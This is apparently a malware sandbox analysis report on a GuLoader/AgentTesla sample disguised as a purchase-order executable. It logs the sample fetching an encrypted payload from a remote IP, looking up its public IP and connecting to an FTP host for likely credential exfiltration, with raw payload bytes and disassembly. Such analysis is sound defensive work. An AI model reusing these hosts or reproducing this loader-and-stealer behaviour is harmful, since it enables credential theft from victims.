                                                Dec 4, 2024 09:23:16.066170931 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.066237926 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.066282988 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.066338062 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.069205999 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.069262028 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.069336891 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.069379091 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.072189093 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.072271109 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.072364092 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.072407961 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.124799967 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.124890089 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.124916077 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.124979019 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.125721931 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.125781059 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.125850916 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.125900984 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.128768921 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.128829956 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.128910065 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.128966093 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.132009983 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.132071972 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.132200956 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.132251024 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.134869099 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.134928942 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.135014057 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.135072947 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.137891054 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.137948990 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.138005018 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.138052940 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.140903950 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.140958071 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.141047001 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.141093016 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.143953085 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.144006014 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.144089937 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.144139051 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.147020102 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.147072077 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.147238970 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.147285938 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.150013924 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.150090933 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.150170088 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.150222063 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.153064013 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.153176069 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.153211117 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.153254986 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.156068087 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.156183958 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.156218052 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.156266928 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.157974005 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.158071041 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.158111095 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.158163071 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.159810066 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.159883022 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.160012960 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.160060883 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.161662102 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.161753893 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.161788940 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.161839008 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.163589001 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.163649082 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.163685083 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.163738012 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.165359974 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.165422916 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.165510893 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.165563107 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.167268991 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.167330027 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.167395115 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.167442083 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.169056892 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.169115067 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.169215918 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.169269085 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.170911074 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.170998096 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.171030045 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.171077967 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.172789097 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.172815084 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.172867060 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.172897100 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:17.421111107 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:17.421179056 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:17.421247959 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:17.468791962 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:17.468828917 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:18.736737967 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:18.737013102 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:18.738925934 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:18.738945961 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:18.739207983 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:18.781276941 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:19.151343107 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:19.199332952 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:19.485344887 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:19.485409021 CET44349954104.26.12.205192.168.2.7
                                                Dec 4, 2024 09:23:19.485454082 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:19.491343021 CET49954443192.168.2.7104.26.12.205
                                                Dec 4, 2024 09:23:21.884433031 CET4996321192.168.2.7192.185.13.234
                                                Dec 4, 2024 09:23:22.004422903 CET2149963192.185.13.234192.168.2.7
                                                Dec 4, 2024 09:23:22.004565954 CET4996321192.168.2.7192.185.13.234
                                                Dec 4, 2024 09:23:22.008858919 CET4996321192.168.2.7192.185.13.234
                                                Dec 4, 2024 09:23:22.128967047 CET2149963192.185.13.234192.168.2.7
                                                Dec 4, 2024 09:23:22.129054070 CET4996321192.168.2.7192.185.13.234
                                                Dec 4, 2024 09:25:03.870249033 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:25:03.990768909 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:25:03.990896940 CET4994680192.168.2.7109.248.150.252
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 4, 2024 09:23:17.265150070 CET5149653192.168.2.71.1.1.1
                                                Dec 4, 2024 09:23:17.404616117 CET53514961.1.1.1192.168.2.7
                                                Dec 4, 2024 09:23:21.143016100 CET5544853192.168.2.71.1.1.1
                                                Dec 4, 2024 09:23:21.883215904 CET53554481.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 4, 2024 09:23:17.265150070 CET192.168.2.71.1.1.10xbc6Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Dec 4, 2024 09:23:21.143016100 CET192.168.2.71.1.1.10xec9fStandard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 4, 2024 09:23:17.404616117 CET1.1.1.1192.168.2.70xbc6No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Dec 4, 2024 09:23:17.404616117 CET1.1.1.1192.168.2.70xbc6No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Dec 4, 2024 09:23:17.404616117 CET1.1.1.1192.168.2.70xbc6No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Dec 4, 2024 09:23:21.883215904 CET1.1.1.1192.168.2.70xec9fNo error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 4, 2024 09:23:21.883215904 CET1.1.1.1192.168.2.70xec9fNo error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • 109.248.150.252
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749946109.248.150.252807972C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 4, 2024 09:23:13.994492054 CET186OUTGET /CoefvoxbOhqqwMfAyfMH15.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: 109.248.150.252
                                                Cache-Control: no-cache
                                                Dec 4, 2024 09:23:15.283227921 CET1236INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Wed, 04 Dec 2024 06:18:41 GMT
                                                Accept-Ranges: bytes
                                                ETag: "c1e9175d1446db1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Wed, 04 Dec 2024 08:23:13 GMT
                                                Content-Length: 241728
                                                Data Raw: e5 43 48 b1 c9 0c 3d 13 b2 35 88 cb 7d ce 12 ad 5b 1d 5b d1 a3 5e f4 69 f3 f5 cf 80 f1 e6 15 e4 de 07 be 91 dd 79 da 75 3e 6b d9 63 a3 9e df dc 55 0d 62 f0 55 2b 5b 56 79 f3 39 c1 2b f8 de 28 7e b8 6f e3 89 b1 ca 1b f7 3d f9 16 6a e0 e8 ca bb 63 e7 5b 6b 43 52 7f 52 98 08 e3 d7 13 7b 7e a8 e6 26 d4 9f 01 98 d8 dc 3a 3e 3e 05 ec c0 67 2e d2 33 b9 ed 31 ed ea 92 6e 22 f0 68 ba 30 bb 09 14 ec 4e 1d 92 45 b1 8d 00 b2 42 c7 16 18 23 b1 47 f5 94 2d d5 47 7e d0 79 72 6d 31 08 61 4f ec f9 73 6f 1c ff cd fc dc 85 b2 fd 6b 3e 9e 8d 86 08 07 f7 0f 7e 39 a8 e5 c6 4f 41 7a bd 98 fa 5e cd 70 74 bc f3 62 bb e6 cc 13 85 97 c2 6b 77 b8 4c 01 73 80 bd 18 1a fe 60 18 2f 32 6b c3 6d 56 18 21 f0 63 a7 77 56 39 51 fc b2 2e 07 a2 d8 d5 df a9 c0 e6 a4 3d a3 5a de 47 42 0f 04 f2 f8 40 66 bb 00 22 f5 3b 48 57 fd 64 8d 35 03 3b 64 94 b1 3b 8d 64 78 24 d0 e7 89 da 86 9c dd 2d af cb ce c2 14 40 e4 5f 4c ff 41 ea cb dc 83 79 bb c5 09 09 21 e8 01 8b d8 63 58 a7 dd 4e 58 0d ab 51 92 77 b6 39 ea 3a ac f6 28 84 66 cb 48 d2 4f 20 d5 [TRUNCATED]
                                                Data Ascii: CH=5}[[^iyu>kcUbU+[Vy9+(~o=jc[kCRR{~&:>>g.31n"h0NEB#G-G~yrm1aOsok>~9OAz^ptbkwLs`/2kmV!cwV9Q.=ZGB@f";HWd5;d;dx$-@_LAy!cXNXQw9:(fHO Ov*7[QU.4ru0SMzE@>jQ3k-mNQ6MxJu9V/$gj E;Emd8t2O*WHiGbI ?c?<('=f/>BtM3B|53LGoQk},R"a\Syu|-1,TpA,AJ{Pi9KI+/~_bY)$52{zx_BzLfe9<N>aqf@},hbmuXg(lv<?saN7'))A"'jau-_"bv\;{WM97a[x|-?=JKkLXC8y&#s>7#-T3z@}Gd}$<_-LD|m3[<XL+9Y)f$gxt^[z@Pod|Ar+GzAEQD
                                                Dec 4, 2024 09:23:15.283368111 CET1236INData Raw: 0f c6 e2 e1 4f 2c 67 7e 5f 2f 58 38 a5 cd fe 66 b4 be 61 d5 a9 ad 30 e4 54 f1 23 65 f3 39 8e a4 3f d0 99 e6 4d 0f d9 70 1a eb 84 61 79 15 72 99 23 62 75 87 14 55 33 76 fa a6 6f 86 b9 79 20 38 69 e0 10 cf a1 f0 4c 89 e1 1d d6 50 e9 03 5b 4c 22 36
                                                Data Ascii: O,g~_/X8fa0T#e9?Mpayr#buU3voy 8iLP[L"6M41 Y"O+('L#B\e%7d&=_`/r}v^z=UHpz7dQJ'^z+1jg2Q^@iF>:
                                                Dec 4, 2024 09:23:15.283380985 CET1236INData Raw: 4d f4 cd 95 80 9f bc 1e 2f 7a 96 15 14 4a c8 95 93 d4 93 66 0c d4 ad 34 98 ec 5a c4 97 a5 3d 6e d0 2c 3f 50 78 1e 9e 9e 78 84 92 44 ed 55 45 48 b0 bc b5 07 96 53 89 1b 27 57 80 ca c3 d9 55 b2 e2 e3 64 81 ea d1 6b d8 c2 45 9d 0c c2 47 89 78 e3 3c
                                                Data Ascii: M/zJf4Z=n,?PxxDUEHS'WUdkEGx<UlIQVp\d!5p'n4(p1nb/mYUM.#^UYPYg]Rir ;bfhxFG^X%YX'P?A
                                                Dec 4, 2024 09:23:15.283873081 CET1236INData Raw: 87 91 4f a5 5a 7a 24 da 67 58 da 86 9a f7 73 28 b0 1c d2 14 44 de 7d 4e fc 3c 28 cb dc 97 53 a5 c7 72 da 21 f8 05 a1 fa 61 5b da 0e 4e 58 09 81 db 55 0f 6d 6e ea 3e 86 d4 ca 84 1b 56 4d d2 4b 0a cb 0d 34 aa 2a 15 18 ca a5 e6 34 26 63 86 a6 16 9d
                                                Data Ascii: OZz$gXs(D}N<(Sr!a[NXUmn>VMK4*4&cKWc4r_aSIP>K@:@Rk7-lDyY6KRHwW/Y6"mcw/9*p<J,hkkaM''#1?<A(#2#d
                                                Dec 4, 2024 09:23:15.283886909 CET896INData Raw: 4f 69 d9 4e 79 d7 54 46 1a 6e 2f 01 8f 14 68 d6 51 e3 7e 11 9e 12 45 a9 c3 de f6 b6 f3 7e 7b a8 e1 52 dd 1f 2f b3 a0 79 e1 93 66 17 1c b0 df 72 57 8d 2e 21 b3 7f 5f 44 7c f8 74 04 df e5 cc d5 0e b3 f3 db d1 d4 0e 74 1d e3 2a 13 be 92 7e 44 f7 df
                                                Data Ascii: OiNyTFn/hQ~E~{R/yfrW.!_D|tt*~Dssga-$1,Cfb0#Vs7ve$`=6{RiOcY-cV4O:p[k=]1{^&a2>g.;n0EV@*L|Mr4g ,
                                                Dec 4, 2024 09:23:15.363658905 CET1236INData Raw: 83 9d 3a f8 d7 9a 83 f4 17 64 f9 53 1d 62 68 7c 47 be b1 1e 26 ff 16 d7 1e 20 ee 8f f0 70 4f 92 5f 58 23 01 d8 5a d7 47 32 48 2f e3 9d ca e2 ca 2d 8c 8f 3b 95 be bf c0 b6 d8 7f fa f4 44 7a aa a7 10 fe 14 30 13 bb 8d 15 fc 28 c5 d4 70 db 30 9e 98
                                                Data Ascii: :dSbh|G& pO_X#ZG2H/-;Dz0(p0d(<_80E33[.D:QoyXu&^}WF3fVd(x*/*@In:+K/hY@?RGSr5Gp5fE#K"bU
                                                Dec 4, 2024 09:23:15.363835096 CET1236INData Raw: 94 82 02 3f c4 3d 17 ad 8c 8c 13 2f f8 f8 17 89 15 ef 5f d7 12 9c 72 f0 8e 11 d4 41 4e 69 fb 01 a9 86 69 10 83 2f 64 45 c3 fa ca 2d e6 cf bc 1d 2d 0f cc 95 5e d8 3f cb 40 81 be bf 17 0a ec 28 d9 d9 16 39 66 62 63 e3 3e 79 de df 11 9b 5d b7 a1 e9
                                                Data Ascii: ?=/_rANii/dE--^?@(9fbc>y]4lN3|23SpKkQS:u+Ria\xL#Y;K,6^]p~3'1>PIE+h_ Dur)U8P\2{D!/Yc
                                                Dec 4, 2024 09:23:15.363848925 CET1236INData Raw: 7a 45 7f 12 98 28 ec d7 13 7b f3 9d e6 26 d5 61 0f 99 d8 fc 38 3e 3e 05 12 ce 64 2e d2 cd b5 ee 31 cd ee 92 6e 22 0e e9 83 28 bb 07 0b a8 4c 1c 26 6c 7e ac b8 b3 7c 0d 35 4c 3b 7a 14 d0 e4 5f ba de 02 b2 14 52 f0 5c 65 0f 00 94 d9 11 0a c2 8c 81
                                                Data Ascii: zE({&a8>>d.1n"(L&l~|5L;z_R\e##pgcS\6doLzptb:(3<jNLsl/2mVaq.?T]ZG?DfE#CSd4;d=bxm*5`_Ly;!cpNRWt9
                                                Dec 4, 2024 09:23:15.364291906 CET672INData Raw: 26 31 77 3f 54 84 00 67 65 35 25 71 f1 ca 2b 86 4a 1e 4f ee 46 86 e9 b6 11 60 e3 64 ca a0 9d ee 73 2e 6b 43 5e 07 1f fc 65 11 97 03 e1 1c f9 0d b8 c2 d0 00 0b 6a a0 ca 5b 0c 66 f0 a3 8d 06 10 77 12 c8 89 fb 65 97 24 e5 78 39 fe 01 5f 74 ac de cc
                                                Data Ascii: &1w?Tge5%q+JOF`ds.kC^ej[fwe$x9_t:.#zcA~<99BiU]mv)4AO?j0X4M:;%>lqb[N{xEuY&qRC:0XNi'OmUF()H~2G={V&y7]ZP)3x_
                                                Dec 4, 2024 09:23:15.403525114 CET1236INData Raw: af a0 1d 78 6f 51 e0 13 44 47 7c cd 3a a2 cc a7 e5 84 07 13 3a 56 5f 20 07 d1 f8 c6 c3 cf 74 e6 26 ee 90 f7 e4 20 e0 45 81 a8 86 ee 15 73 20 eb b2 e7 94 ba f3 c4 c9 38 17 7b b4 80 13 05 c3 9b e8 76 14 33 76 f7 12 9c 8c 03 82 11 2a 87 45 69 fb 18
                                                Data Ascii: xoQDG|::V_ t& Es 8{v3v*EiiI[#S?@)(hokgE3B3}5k?3aQk]u RIm\*LSy8fi2&~vaAobF{Pph'9KE
                                                Dec 4, 2024 09:23:15.403594971 CET1236INData Raw: 8c 0a 04 5f 08 d3 6e 17 3c 0f 50 be 53 dd 17 20 57 63 cf 9b 13 18 55 03 f6 d9 6f 5a 34 13 ff ff e3 8a 4f cb 22 c1 3d f9 16 bd 2e e8 ca 09 9d eb 5c 6b 2c 03 7f 12 92 28 e2 d7 13 7b f3 91 e6 26 d5 61 0f 93 d8 22 36 35 3e 6a c5 c0 67 24 2c 3d b9 ed
                                                Data Ascii: _n<PS WcUoZ4O"=.\k,({&a"65>jg$,=n0EV`&L|R.7L04W VRZNL <#!}kop48Nx`rt`uu3<etls`a>MZ!NML"'}?j}[IB&DfE.;_d%;djdz


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749954104.26.12.2054437972C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-04 08:23:19 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-12-04 08:23:19 UTC424INHTTP/1.1 200 OK
                                                Date: Wed, 04 Dec 2024 08:23:19 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8eca64c9ba0a0f43-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1679&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1703617&cwnd=178&unsent_bytes=0&cid=abb47e6e52d67138&ts=758&x=0"
                                                2024-12-04 08:23:19 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                Data Ascii: 8.46.123.228


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:03:21:09
                                                Start date:04/12/2024
                                                Path:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"
                                                Imagebase:0x400000
                                                File size:615'420 bytes
                                                MD5 hash:52131CCE80DE6868D4EB452EC3BCB91B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2416834766.0000000004E77000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:11
                                                Start time:04:43:50
                                                Start date:04/12/2024
                                                Path:C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"
                                                Imagebase:0x400000
                                                File size:615'420 bytes
                                                MD5 hash:52131CCE80DE6868D4EB452EC3BCB91B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3726491154.0000000034FAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3726491154.0000000034F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:16.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16%
                                                  Total number of Nodes:1602
                                                  Total number of Limit Nodes:36
                                                  execution_graph 4236 401bc0 4237 401c11 4236->4237 4238 401bcd 4236->4238 4240 401c16 4237->4240 4241 401c3b GlobalAlloc 4237->4241 4239 4023af 4238->4239 4246 401be4 4238->4246 4243 4066df 21 API calls 4239->4243 4249 401c56 4240->4249 4274 4066a2 lstrcpynW 4240->4274 4255 4066df 4241->4255 4245 4023bc 4243->4245 4245->4249 4275 405d02 4245->4275 4272 4066a2 lstrcpynW 4246->4272 4247 401c28 GlobalFree 4247->4249 4251 401bf3 4273 4066a2 lstrcpynW 4251->4273 4253 401c02 4279 4066a2 lstrcpynW 4253->4279 4270 4066ea 4255->4270 4256 406931 4257 40694a 4256->4257 4302 4066a2 lstrcpynW 4256->4302 4257->4249 4259 406902 lstrlenW 4259->4270 4263 4067fb GetSystemDirectoryW 4263->4270 4264 4066df 15 API calls 4264->4259 4265 406811 GetWindowsDirectoryW 4265->4270 4267 4066df 15 API calls 4267->4270 4268 4068a3 lstrcatW 4268->4270 4270->4256 4270->4259 4270->4263 4270->4264 4270->4265 4270->4267 4270->4268 4271 406873 SHGetPathFromIDListW CoTaskMemFree 4270->4271 4280 406570 4270->4280 4285 406a96 GetModuleHandleA 4270->4285 4291 406950 4270->4291 4300 4065e9 wsprintfW 4270->4300 4301 4066a2 lstrcpynW 4270->4301 4271->4270 4272->4251 4273->4253 4274->4247 4276 405d17 4275->4276 4277 405d63 4276->4277 4278 405d2b MessageBoxIndirectW 4276->4278 4277->4249 4278->4277 4279->4249 4303 40650f 4280->4303 4283 4065d4 4283->4270 4284 4065a4 RegQueryValueExW RegCloseKey 4284->4283 4286 406ab2 4285->4286 4287 406abc GetProcAddress 4285->4287 4307 406a26 GetSystemDirectoryW 4286->4307 4289 406acb 4287->4289 4289->4270 4290 406ab8 4290->4287 4290->4289 4297 40695d 4291->4297 4292 4069d3 4293 4069d8 CharPrevW 4292->4293 4296 4069f9 4292->4296 4293->4292 4294 4069c6 CharNextW 4294->4292 4294->4297 4296->4270 4297->4292 4297->4294 4298 4069b2 CharNextW 4297->4298 4299 4069c1 CharNextW 4297->4299 4310 405f9e 4297->4310 4298->4297 4299->4294 4300->4270 4301->4270 4302->4257 4304 40651e 4303->4304 4305 406522 4304->4305 4306 406527 RegOpenKeyExW 4304->4306 4305->4283 4305->4284 4306->4305 4308 406a48 wsprintfW LoadLibraryExW 4307->4308 4308->4290 4311 405fa4 4310->4311 4312 405fba 4311->4312 4313 405fab CharNextW 4311->4313 4312->4297 4313->4311 5173 406dc0 5174 406c44 5173->5174 5175 4075af 5174->5175 5176 406cc5 GlobalFree 5174->5176 5177 406cce GlobalAlloc 5174->5177 5178 406d45 GlobalAlloc 5174->5178 5179 406d3c GlobalFree 5174->5179 5176->5177 5177->5174 5177->5175 5178->5174 5178->5175 5179->5178 5180 402641 5181 402dcb 21 API calls 5180->5181 5182 402648 5181->5182 5185 406192 GetFileAttributesW CreateFileW 5182->5185 5184 402654 5185->5184 4330 4025c3 4342 402e0b 4330->4342 4334 4025d6 4335 4025e5 4334->4335 4340 402953 4334->4340 4336 4025f2 RegEnumKeyW 4335->4336 4337 4025fe RegEnumValueW 4335->4337 4339 40261a RegCloseKey 4336->4339 4338 402613 4337->4338 4337->4339 4338->4339 4339->4340 4343 402dcb 21 API calls 4342->4343 4344 402e22 4343->4344 4345 40650f RegOpenKeyExW 4344->4345 4346 4025cd 4345->4346 4347 402da9 4346->4347 4348 4066df 21 API calls 4347->4348 4349 402dbe 4348->4349 4349->4334 5186 4015c8 5187 402dcb 21 API calls 5186->5187 5188 4015cf SetFileAttributesW 5187->5188 5189 4015e1 5188->5189 5197 401fc9 5198 402dcb 21 API calls 5197->5198 5199 401fcf 5198->5199 5200 405727 28 API calls 5199->5200 5201 401fd9 5200->5201 5202 405c85 2 API calls 5201->5202 5203 401fdf 5202->5203 5204 402953 5203->5204 5208 402002 CloseHandle 5203->5208 5210 406b41 WaitForSingleObject 5203->5210 5207 401ff4 5207->5208 5215 4065e9 wsprintfW 5207->5215 5208->5204 5211 406b5b 5210->5211 5212 406b6d GetExitCodeProcess 5211->5212 5213 406ad2 2 API calls 5211->5213 5212->5207 5214 406b62 WaitForSingleObject 5213->5214 5214->5211 5215->5208 5216 404acb 5217 404b01 5216->5217 5218 404adb 5216->5218 5226 